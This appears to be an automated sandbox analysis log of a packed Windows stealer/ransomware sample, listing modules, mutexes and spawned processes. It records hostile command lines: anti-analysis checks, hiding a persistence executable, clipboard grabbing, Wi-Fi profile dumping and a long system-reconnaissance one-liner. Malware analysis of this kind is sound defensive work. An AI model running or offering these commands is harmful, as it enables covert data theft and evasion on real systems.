Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_asyncio.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119754812.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepyexpat.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_uuid.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepython3.dll. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_overlapped.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120211904.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_multiprocessing.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120115665.000002BD86720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457245244.00007FFDA3472000.00000004.00000001.01000000.00000011.sdmp Binary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460676756.00007FFDA549C000.00000004.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457439135.00007FFDA355D000.00000004.00000001.01000000.0000000F.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459467676.00007FFDA4348000.00000004.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457747412.00007FFDA36CE000.00000004.00000001.01000000.0000000E.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458141259.00007FFDA3733000.00000004.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459169072.00007FFDA4177000.00000004.00000001.01000000.0000000B.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460091484.00007FFDA4DAF000.00000004.00000001.01000000.00000013.sdmp Binary or memory string: OriginalFilename_overlapped.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457964302.00007FFDA370B000.00000004.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmp Binary or memory string: OriginalFilenamelibcryptoH vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458978291.00007FFDA3FDC000.00000004.00000001.01000000.00000023.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460440524.00007FFDA5477000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2456768038.00007FFDA3304000.00000004.00000001.01000000.00000015.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000000.2126704993.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFynix.exej% vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458771892.00007FFDA3AFD000.00000004.00000001.01000000.0000000D.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458345789.00007FFDA3A93000.00000004.00000001.01000000.00000012.sdmp Binary or memory string: OriginalFilename_asyncio.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454765569.00007FFD944E5000.00000004.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenamepython310.dll. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440853445.0000018B46A80000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilenamepython3.dll. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459699045.00007FFDA4639000.00000004.00000001.01000000.0000001D.sdmp Binary or memory string: OriginalFilename_uuid.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe Binary or memory string: OriginalFilenameFynix.exej% vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: Commandline size = 3647 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: libcrypto-1_1.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.998771639088251
Source: libssl-1_1.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9903694614553314
Source: python310.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9993369105871887
Source: sqlite3.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9979559935490694
Source: unicodedata.pyd.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9941871279761905
Source: classification engine Classification label: mal100.rans.spre.phis.troj.spyw.evad.winEXE@141/144@6/6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\ExelaUpdateService\ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Mutant created: \Sessions\1\BaseNamedObjects\E
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3928:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1016:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3768:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922 Jump to behavior
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\cmd.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe String found in binary or memory: set-addPolicy
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe String found in binary or memory: id-cmc-addExtensions
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe String found in binary or memory: can't send non-None value to a just-started generator
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe String found in binary or memory: --help
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe String found in binary or memory: --help
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\query.exe query user
Source: C:\Windows\System32\query.exe Process created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup administrators
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user guest
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /svc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show config
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
